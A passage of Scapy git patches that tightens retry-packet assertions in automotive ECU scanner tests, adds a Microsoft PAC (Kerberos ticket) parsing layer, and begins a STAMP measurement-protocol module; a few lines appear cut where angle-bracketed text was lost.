_get_table_entry_z(self, tup): def pre_execute(self, socket, state, global_configuration): # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 - if cast(ServiceEnumerator, self)._retry_pkt[state] is not None: + if cast(ServiceEnumerator, self)._retry_pkt[state]: # this is a retry execute. Wait much longer than usual because # a required time delay not expired could have been received # on the previous attempt diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 5941e04b562..6a232d94c14 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -110,21 +110,21 @@ s = EcuState(session=1) assert False == e._evaluate_response(s, GMLAN(b"\x27\x01"), None, **config) config = {"exit_if_service_not_supported": True} -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x7f\x27\x11"), **config) -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x7f\x27\x22"), **config) assert e._retry_pkt[s] == GMLAN(b"\x27\x01") assert False == e._evaluate_response(s, GMLAN(b"\x27\x02"), GMLAN(b"\x7f\x27\x22"), **config) -assert e._retry_pkt[s] is None +assert not e._retry_pkt[s] assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x7f\x27\x37"), **config) assert e._retry_pkt[s] == GMLAN(b"\x27\x01") assert False == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x7f\x27\x37"), **config) -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x67\x01ab"), **config) -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] assert False == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x67\x02ab"), **config) -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] = Simulate ECU and run Scanner diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index c37d15549f5..b0024d7a7c2 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -169,21 +169,21 @@ assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x11"), **conf) assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x7f"), **conf) conf = {"exit_if_service_not_supported": False, "retry_if_busy_returncode": True} -assert e._retry_pkt[EcuState(session=1)] == None +assert not e._retry_pkt[EcuState(session=1)] assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x10"), **conf) assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x11"), **conf) assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x7f"), **conf) -assert e._retry_pkt[EcuState(session=1)] == None +assert not e._retry_pkt[EcuState(session=1)] assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x21"), **conf) assert e._retry_pkt[EcuState(session=1)] == UDS(b"\x10\x03abcd") assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x21"), **conf) -assert e._retry_pkt[EcuState(session=1)] == None +assert not e._retry_pkt[EcuState(session=1)] assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x50\x03\x00"), **conf) assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x11\x03abcd"), UDS(b"\x51\x03\x00"), **conf) conf = {"retry_if_none_received": True} assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), None, **conf) -assert e._retry_pkt[EcuState(session=1)] is not None +assert e._retry_pkt[EcuState(session=1)] = ServiceEnumerator execute @@ -286,14 +286,14 @@ e = MyTestCase() e.execute(sock, EcuState(session=1), exit_if_service_not_supported=True) -assert e._retry_pkt[EcuState(session=1)] is None +assert not e._retry_pkt[EcuState(session=1)] assert len(e.results_with_response) == 1 assert len(e.results_with_negative_response) == 1 assert e.completed e.execute(sock, EcuState(session=2), exit_if_service_not_supported=True) -assert e._retry_pkt[EcuState(session=2)] is None +assert not e._retry_pkt[EcuState(session=2)] assert len(e.results_with_response) == 2 assert len(e.results_with_negative_response) == 2 assert e.completed @@ -307,7 +307,7 @@ e = MyTestCase() e.execute(sock, EcuState(session=1)) -assert e._retry_pkt[EcuState(session=1)] is not None +assert e._retry_pkt[EcuState(session=1)] assert len(e.results_with_response) == 1 assert len(e.results_with_negative_response) == 1 assert len(e.results_without_response) == 0 @@ -315,7 +315,7 @@ assert not e.completed e.execute(sock, EcuState(session=1)) -assert e._retry_pkt[EcuState(session=1)] is None +assert not e._retry_pkt[EcuState(session=1)] assert len(e.results_with_response) == 2 assert len(e.results_with_negative_response) == 2 assert len(e.results_without_response) == 9 @@ -330,7 +330,7 @@ e = MyTestCase() e.execute(sock, EcuState(session=1), retry_if_busy_returncode=False) -assert e._retry_pkt[EcuState(session=1)] is None +assert not e._retry_pkt[EcuState(session=1)] assert len(e.results_with_response) == 1 assert len(e.results_with_negative_response) == 1 assert len(e.results_without_response) == 9 @@ -345,7 +345,7 @@ e = MyTestCase() e.execute(sock, EcuState(session=1), execution_time=-1) -assert e._retry_pkt[EcuState(session=1)] is None +assert not e._retry_pkt[EcuState(session=1)] assert len(e.results_with_response) == 1 assert len(e.results_with_negative_response) == 1 assert len(e.results_without_response) == 0 diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 89cd915b8f8..78a39287c6f 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -128,21 +128,21 @@ s = EcuState(session=1) assert False == e._evaluate_response(s, UDS(b"\x27\x01"), None, **config) config = {"exit_if_service_not_supported": True} -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] assert True == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x7f\x27\x11"), **config) -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] assert True == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x7f\x27\x24"), **config) assert e._retry_pkt[s] == UDS(b"\x27\x01") assert False == e._evaluate_response(s, UDS(b"\x27\x02"), UDS(b"\x7f\x27\x24"), **config) -assert e._retry_pkt[s] is None +assert not e._retry_pkt[s] assert True == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x7f\x27\x37"), **config) assert e._retry_pkt[s] == UDS(b"\x27\x01") assert False == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x7f\x27\x37"), **config) -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] assert True == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x67\x01ab"), **config) -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] assert False == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x67\x02ab"), **config) -assert e._retry_pkt[s] == None +assert not e._retry_pkt[s] = Test UDS_SA_XOR_Enumerator stand alone mode From 83dba061f42e2c321cc8b69e66719f6a67ca2143 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 27 Sep 2022 14:29:19 +0200 Subject: [PATCH 0889/1632] Parse PAC from kerberos tickets (#3738) * Parse & build PAC from kerberos tickets * Implement all PAC fields * Make FieldListField public --- scapy/config.py | 1 + scapy/layers/dcerpc.py | 86 +++- scapy/layers/kerberos.py | 63 +-- scapy/layers/mspac.py | 805 +++++++++++++++++++++++++++++++++ scapy/packet.py | 2 +- test/scapy/layers/kerberos.uts | 592 +++++++++++++++++++++++- 6 files changed, 1485 insertions(+), 64 deletions(-) create mode 100644 scapy/layers/mspac.py diff --git a/scapy/config.py b/scapy/config.py index 5a5c6ca5a54..ff1ab877f08 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -857,6 +857,7 @@ class Conf(ConfClass): 'lltd', 'mgcp', 'mobileip', + 'mspac', 'netbios', 'netflow', 'ntlm', diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index a5ccc71b4ea..be54d8f4f03 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -13,6 +13,9 @@ Based on [C706] - aka DCE/RPC 1.1 https://pubs.opengroup.org/onlinepubs/9629399/toc.pdf + +And on [MS-RPCE] +https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15 """ from functools import partial @@ -1371,6 +1374,18 @@ def i2len(self, pkt, x): return len(x) +class NDRFieldListField(NDRConstructedType, FieldListField): + """ + A FieldListField for NDR + """ + + islist = 1 + + def __init__(self, *args, **kwargs): + FieldListField.__init__(self, *args, **kwargs) + NDRConstructedType.__init__(self, [self.field]) + + class NDRVaryingArray(_NDRPacket): fields_desc = [ MultipleTypeField( @@ -1499,13 +1514,13 @@ def addfield(self, pkt, s, val): "Expected NDRConformantString in %s. You are using it wrong!" % self.name ) - elif not isinstance(val, NDRConformantArray): + elif not self.CONFORMANT_STRING and not isinstance(val, NDRConformantArray): raise ValueError( "Expected NDRConformantArray in %s. You are using it wrong!" % self.name ) fmt = [" + +""" +[MS-PAC] + +https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/166d8064-c863-41e1-9c23-edaaa5f36962 +""" + +import struct + +from scapy.config import conf +from scapy.error import log_runtime +from scapy.fields import ( + ConditionalField, + FieldLenField, + FieldListField, + FlagsField, + LEIntEnumField, + LELongField, + LEIntField, + LEShortField, + MultipleTypeField, + PacketLenField, + PacketListField, + StrField, + StrFieldUtf16, + StrFixedLenField, + StrLenFieldUtf16, + UTCTimeField, + XStrField, + XStrLenField, +) +from scapy.packet import Packet +from scapy.layers.kerberos import _AUTHORIZATIONDATA_VALUES +from scapy.layers.dcerpc import ( + _NDRConfField, + NDRByteField, + NDRConfStrLenField, + NDRConfVarStrLenField, + NDRConfVarStrLenFieldUtf16, + NDRConfPacketListField, + NDRConfFieldListField, + NDRConfVarStrNullFieldUtf16, + NDRConformantString, + NDRFullPointerField, + NDRInt3264EnumField, + NDRIntField, + NDRLongField, + NDRPacket, + NDRPacketField, + NDRSerialization1Header, + NDRShortField, + NDRSignedLongField, + NDRUnionField, + ndr_deserialize1, + ndr_serialize1, +) +from scapy.layers.ntlm import ( + _NTLMPayloadField, + _NTLMPayloadPacket, + _NTLM_post_build, +) + +# sect 2.4 + + +class PAC_INFO_BUFFER(Packet): + fields_desc = [ + LEIntEnumField( + "ulType", + 0x00000001, + { + 0x00000001: "Logon information", + 0x00000002: "Credentials information", + 0x00000006: "Server checksum", + 0x00000007: "KDC checksum", + 0x0000000A: "Client name and ticket information", + 0x0000000B: "Constrained delegation information", + 0x0000000C: "UPN and DNS information", + 0x0000000D: "Client claims information", + 0x0000000E: "Device information", + 0x0000000F: "Device claims information", + 0x00000010: "Ticket checksum", + 0x00000011: "PAC Attributes", + 0x00000012: "PAC Requestor", + }, + ), + LEIntField("cbBufferSize", None), + LELongField("Offset", None), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +_PACTYPES = {} + +# sect 2.5 - NDR PACKETS AUTO-GENERATED + + +class RPC_UNICODE_STRING(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRShortField("Length", 0), + NDRShortField("MaximumLength", 0), + NDRFullPointerField( + NDRConfVarStrLenFieldUtf16( + "Buffer", "", length_from=lambda pkt: (pkt.Length // 2) + ), + deferred=True, + ), + ] + + +class FILETIME(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [NDRIntField("dwLowDateTime", 0), NDRIntField("dwHighDateTime", 0)] + + +class PGROUP_MEMBERSHIP(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [NDRIntField("RelativeId", 0), NDRIntField("Attributes", 0)] + + +class CYPHER_BLOCK(NDRPacket): + fields_desc = [StrFixedLenField("data", "", length=8)] + + +class USER_SESSION_KEY(NDRPacket): + fields_desc = [PacketListField("data", [], CYPHER_BLOCK, count_from=lambda _: 2)] + + +class RPC_SID_IDENTIFIER_AUTHORITY(NDRPacket): + fields_desc = [StrFixedLenField("Value", "", length=6)] + + +class PSID(NDRPacket): + ALIGNMENT = (4, 8) + CONFORMANT_COUNT = 1 + fields_desc = [ + NDRByteField("Revision", 0), + NDRByteField("SubAuthorityCount", 0), + NDRPacketField( + "IdentifierAuthority", + RPC_SID_IDENTIFIER_AUTHORITY(), + RPC_SID_IDENTIFIER_AUTHORITY, + ), + NDRConfFieldListField( + "SubAuthority", + [], + NDRIntField("", 0), + count_from=lambda pkt: pkt.SubAuthorityCount, + conformant_in_struct=True, + ), + ] + + +class PKERB_SID_AND_ATTRIBUTES(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullPointerField(NDRPacketField("Sid", PSID(), PSID), deferred=True), + NDRIntField("Attributes", 0), + ] + + +class KERB_VALIDATION_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("LogonTime", FILETIME(), FILETIME), + NDRPacketField("LogoffTime", FILETIME(), FILETIME), + NDRPacketField("KickOffTime", FILETIME(), FILETIME), + NDRPacketField("PasswordLastSet", FILETIME(), FILETIME), + NDRPacketField("PasswordCanChange", FILETIME(), FILETIME), + NDRPacketField("PasswordMustChange", FILETIME(), FILETIME), + NDRPacketField("EffectiveName", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("FullName", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("LogonScript", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("ProfilePath", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("HomeDirectory", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("HomeDirectoryDrive", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRShortField("LogonCount", 0), + NDRShortField("BadPasswordCount", 0), + NDRIntField("UserId", 0), + NDRIntField("PrimaryGroupId", 0), + NDRIntField("GroupCount", 0), + NDRFullPointerField( + NDRConfPacketListField( + "GroupIds", + [PGROUP_MEMBERSHIP()], + PGROUP_MEMBERSHIP, + count_from=lambda pkt: pkt.GroupCount, + ), + deferred=True, + ), + NDRIntField("UserFlags", 0), + NDRPacketField("UserSessionKey", USER_SESSION_KEY(), USER_SESSION_KEY), + NDRPacketField("LogonServer", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("LogonDomainName", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRFullPointerField( + NDRPacketField("LogonDomainId", PSID(), PSID), deferred=True + ), + FieldListField("Reserved1", [], NDRIntField("", 0), count_from=lambda _: 2), + NDRIntField("UserAccountControl", 0), + FieldListField("Reserved3", [], NDRIntField("", 0), count_from=lambda _: 7), + NDRIntField("SidCount", 0), + NDRFullPointerField( + NDRConfPacketListField( + "ExtraSids", + [PKERB_SID_AND_ATTRIBUTES()], + PKERB_SID_AND_ATTRIBUTES, + count_from=lambda pkt: pkt.SidCount, + ), + deferred=True, + ), + NDRFullPointerField( + NDRPacketField("ResourceGroupDomainSid", PSID(), PSID), deferred=True + ), + NDRIntField("ResourceGroupCount", 0), + NDRFullPointerField( + NDRConfPacketListField( + "ResourceGroupIds", + [PGROUP_MEMBERSHIP()], + PGROUP_MEMBERSHIP, + count_from=lambda pkt: pkt.ResourceGroupCount, + ), + deferred=True, + ), + ] + + +class KERB_VALIDATION_INFO_WRAP(NDRPacket): + # Extra packing class to handle all deferred pointers + # (usually, this would be the packing RPC request/response) + fields_desc = [NDRPacketField("data", None, KERB_VALIDATION_INFO)] + + +_PACTYPES[1] = KERB_VALIDATION_INFO_WRAP + +# sect 2.6 + + +class PAC_CREDENTIAL_INFO(Packet): + fields_desc = [ + LEIntField("Version", 0), + LEIntEnumField( + "EncryptionType", + 1, + { + 0x00000001: "DES-CBC-CRC", + 0x00000003: "DES-CBC-MD5", + 0x00000011: "AES128_CTS_HMAC_SHA1_96", + 0x00000012: "AES256_CTS_HMAC_SHA1_96", + 0x00000017: "RC4-HMAC", + }, + ), + XStrField("SerializedData", b""), + ] + + +_PACTYPES[2] = PAC_CREDENTIAL_INFO + +# sect 2.7 + + +class PAC_CLIENT_INFO(Packet): + fields_desc = [ + UTCTimeField("ClientId", None, fmt=" bytes + return ( + _NTLM_post_build( + self, + pkt, + self.OFFSET, + { + "Upn": 0, + "DnsDomainName": 4, + }, + ) + + pay + ) + + +_PACTYPES[0xC] = UPN_DNS_INFO + +# sect 2.11 - NDR PACKETS AUTO-GENERATED + +try: + from enum import IntEnum +except ImportError: + IntEnum = object + + +class CLAIM_TYPE(IntEnum): + CLAIM_TYPE_INT64 = 1 + CLAIM_TYPE_UINT64 = 2 + CLAIM_TYPE_STRING = 3 + CLAIM_TYPE_BOOLEAN = 6 + + +class CLAIMS_SOURCE_TYPE(IntEnum): + CLAIMS_SOURCE_TYPE_AD = 1 + CLAIMS_SOURCE_TYPE_CERTIFICATE = 2 + + +class CLAIMS_COMPRESSION_FORMAT(IntEnum): + COMPRESSION_FORMAT_NONE = 0 + COMPRESSION_FORMAT_LZNT1 = 2 + COMPRESSION_FORMAT_XPRESS = 3 + COMPRESSION_FORMAT_XPRESS_HUFF = 4 + + +class u_sub0(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("ValueCount", 0), + NDRFullPointerField( + NDRConfFieldListField( + "Int64Values", + [], + NDRSignedLongField, + count_from=lambda pkt: pkt.ValueCount, + ), + deferred=True, + ), + ] + + +class u_sub1(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("ValueCount", 0), + NDRFullPointerField( + NDRConfFieldListField( + "Uint64Values", [], NDRLongField, count_from=lambda pkt: pkt.ValueCount + ), + deferred=True, + ), + ] + + +class u_sub2(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("ValueCount", 0), + NDRFullPointerField( + NDRConfFieldListField( + "StringValues", + [], + NDRFullPointerField( + NDRConfVarStrNullFieldUtf16("StringVal", ""), + deferred=True, + ), + count_from=lambda pkt: pkt.ValueCount, + ), + deferred=True, + ), + ] + + +class u_sub3(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("ValueCount", 0), + NDRFullPointerField( + NDRConfFieldListField( + "BooleanValues", [], NDRLongField, count_from=lambda pkt: pkt.ValueCount + ), + deferred=True, + ), + ] + + +class CLAIM_ENTRY(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("Id", ""), deferred=True), + NDRInt3264EnumField("Type", 0, CLAIM_TYPE), + NDRUnionField( + [ + ( + NDRPacketField("Values", u_sub0(), u_sub0), + ( + ( + lambda pkt: getattr(pkt, "Type", None) == + CLAIM_TYPE.CLAIM_TYPE_INT64 + ), + (lambda _, val: val.tag == CLAIM_TYPE.CLAIM_TYPE_INT64), + ), + ), + ( + NDRPacketField("Values", u_sub1(), u_sub1), + ( + ( + lambda pkt: getattr(pkt, "Type", None) == + CLAIM_TYPE.CLAIM_TYPE_UINT64 + ), + (lambda _, val: val.tag == CLAIM_TYPE.CLAIM_TYPE_UINT64), + ), + ), + ( + NDRPacketField("Values", u_sub2(), u_sub2), + ( + ( + lambda pkt: getattr(pkt, "Type", None) == + CLAIM_TYPE.CLAIM_TYPE_STRING + ), + (lambda _, val: val.tag == CLAIM_TYPE.CLAIM_TYPE_STRING), + ), + ), + ( + NDRPacketField("Values", u_sub3(), u_sub3), + ( + ( + lambda pkt: getattr(pkt, "Type", None) == + CLAIM_TYPE.CLAIM_TYPE_BOOLEAN + ), + (lambda _, val: val.tag == CLAIM_TYPE.CLAIM_TYPE_BOOLEAN), + ), + ), + ], + StrFixedLenField("Values", "", length=0), + align=(2, 8), + switch_fmt=(" Date: Wed, 28 Sep 2022 09:57:21 +0200 Subject: [PATCH 0890/1632] Add support for Simple Two-Way Active Measurement Protocol (STAMP) (#3742) * Add support for STAMP * Add regression test for STAMP This commit adds the support for Simple Two-Way Active Measurement Protocol (STAMP). Simple Two-Way Active Measurement Protocol: https://www.rfc-editor.org/rfc/rfc8762.html Simple Two-Way Active Measurement Protocol Optional Extensions: https://www.rfc-editor.org/rfc/rfc8972.html Signed-off-by: Carmine Scarpitta --- scapy/contrib/stamp.py | 306 +++++++++++++++++++++++++++++++++++++++++ test/contrib/stamp.uts | 88 ++++++++++++ 2 files changed, 394 insertions(+) create mode 100644 scapy/contrib/stamp.py create mode 100644 test/contrib/stamp.uts diff --git a/scapy/contrib/stamp.py b/scapy/contrib/stamp.py new file mode 100644 index 00000000000..300064994f7 --- /dev/null +++ b/scapy/contrib/stamp.py @@ -0,0 +1,306 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Carmine Scarpitta + +# scapy.contrib.description = Simple Two-Way Active Measurement Protocol (STAMP) +# scapy.contrib.status = loads + +""" +STAMP (Simple Two-Way Active Measurement Protocol) - RFC 8762. + +References: + * `Simple Two-Way Active Measurement Protocol [RFC 8762] + `_ + * `Simple Two-Way Active Measurement Protocol Optional Extensions [RFC 8972] + `_ +""" + +from scapy import config +from scapy.base_classes import Packet_metaclass +from scapy.layers.inet import UDP +from scapy.layers.ntp import TimeStampField +from scapy.packet import Packet, bind_layers +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + FlagsField, + IntField, + MultipleTypeField, + NBytesField, + PacketField, + PacketListField, + ShortField, + StrLenField, + UTCTimeField +) + + +_sync_types = { + 0: 'No External Synchronization for the Time Source', + 1: 'Clock Synchronized to UTC using an External Source' +} + +_timestamp_types = { + 0: 'NTP 64-bit Timestamp Format', + 1: 'PTPv2 Truncated Timestamp Format' +} + +_stamp_tlvs = { + +} + + +class ErrorEstimate(Packet): + """ + The Error Estimate specifies the estimate of the error and + synchronization. The format of the Error Estimate field + (defined in Section 4.1.2 of `RFC 4656 + `_) is reported below:: + + 0 1 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + |S|Z| Scale | Multiplier | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + ``S`` is interpreted as follows: + + +-------+-------------------------------------------------------+ + | Value | Description | + +-------+-------------------------------------------------------+ + | 0 | there is no notion of external synchronization for | + | | the time source | + +-------+-------------------------------------------------------+ + | 1 | the party generating the timestamp has a clock that | + | | is synchronized to UTC using an external source | + +-------+-------------------------------------------------------+ + + ``Z`` is interpreted as follows (defined in Section 2.3 of `RFC 8186 + `_): + + +-------+---------------------------------------+ + | Value | Description | + +-------+---------------------------------------+ + | 0 | NTP 64-bit format of a timestamp | + +-------+---------------------------------------+ + | 1 | PTPv2 truncated format of a timestamp | + +-------+---------------------------------------+ + + ``Scale`` and ``Multiplier`` are linked by the following relationship:: + + ErrorEstimate = Multiplier*2^(-32)*2^Scale (in seconds) + + + References: + * `A One-way Active Measurement Protocol (OWAMP) [RFC 4656] + `_ + * `Support of the IEEE 1588 Timestamp Format in a Two-Way Active + Measurement Protocol (TWAMP) [RFC 8186] + `_ + """ + + name = 'Error Estimate' + fields_desc = [ + BitEnumField('S', 0, 1, _sync_types), + BitEnumField('Z', 0, 1, _timestamp_types), + BitField('scale', 0, 6), + ByteField('multiplier', 1), + ] + + def guess_payload_class(self, payload): + # type: (str) -> Packet_metaclass + # Trick to tell scapy that the remaining bytes of the currently + # dissected string is not a payload of this packet but of some other + # underlayer packet + return config.conf.padding_layer + + +class STAMPTestTLV(Packet): + """ + The STAMP Test TLV defined in Section 4 of [RFC 8972] provides a flexible + extension mechanism for optional informational elements. + + The TLV Format in a STAMP Test packet is reported below:: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + |STAMP TLV Flags| Type | Length | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + ~ Value ~ + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + + +-------+---------+-------------------------------------------------+ + | Field | Description | + +-----------------+-------------------------------------------------+ + | STAMP TLV Flags | 8-bit field; for the details about the STAMP | + | | TLV Flags Format, see RFC 8972 | + +-----------------+-------------------------------------------------+ + | Type | characterizes the interpretation of the Value | + | | field | + +-----------------+-------------------------------------------------+ + | Length | the length of the Value field in octets | + +-----------------+-------------------------------------------------+ + | Value | interpreted according to the value of the Type | + | | field | + +-----------------+-------------------------------------------------+ + + + References: + * `Simple Two-Way Active Measurement Protocol Optional Extensions + [RFC 8972] `_ + """ + + name = 'STAMP Test Packet - Generic TLV' + fields_desc = [ + FlagsField('flags', 0, 8, "UMIRRRRR"), + ByteEnumField('type', None, _stamp_tlvs), + ShortField('len', 0), + StrLenField('value', '', length_from=lambda pkt: pkt.len), + ] + + def extract_padding(self, p): + return b"", p + + registered_stamp_tlv = {} + + @classmethod + def register_variant(cls): + cls.registered_stamp_tlv[cls.type.default] = cls + + @classmethod + def dispatch_hook(cls, pkt=None, *args, **kargs): + if pkt: + tmp_type = ord(pkt[1:2]) + return cls.registered_stamp_tlv.get(tmp_type, cls) + return cls + + +class STAMPSessionSenderTestUnauthenticated(Packet): + """ + Extended STAMP Session-Sender Test Packet in Unauthenticated Mode. + + The format (defined in Section 3 of `RFC 8972 + `_) is shown below:: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Sequence Number | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Timestamp | + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Error Estimate | SSID | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | | + | | + | MBZ (28 octets) | + | | + | | + | | + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + ~ TLVs ~ + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + References: + * `Simple Two-Way Active Measurement Protocol Optional Extensions + [RFC 8972] `_ + """ + name = 'STAMP Session-Sender Test' + fields_desc = [ + IntField('seq', 0), + MultipleTypeField( + [ + (TimeStampField('ts', 0), + lambda pkt:pkt.err_estimate.Z == 0) + ], + UTCTimeField('ts', 0, fmt='Q') + ), + PacketField('err_estimate', ErrorEstimate(), ErrorEstimate), + ShortField('ssid', 1), + NBytesField('mbz', 0, 28), # 28 bytes MBZ + PacketListField('tlv_objects', [], STAMPTestTLV, + length_from=lambda pkt: pkt.parent.len - 8 - 44), + ] + + +class STAMPSessionReflectorTestUnauthenticated(Packet): + """ + Extended STAMP Session-Reflector Test Packet in Unauthenticated Mode. + + The format (defined in Section 3 of `RFC 8972 + `_) is shown below:: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Sequence Number | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Timestamp | + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Error Estimate | SSID | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Receive Timestamp | + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Session-Sender Sequence Number | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Session-Sender Timestamp | + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | Session-Sender Error Estimate | MBZ | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + |Ses-Sender TTL | MBZ | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + ~ TLVs ~ + 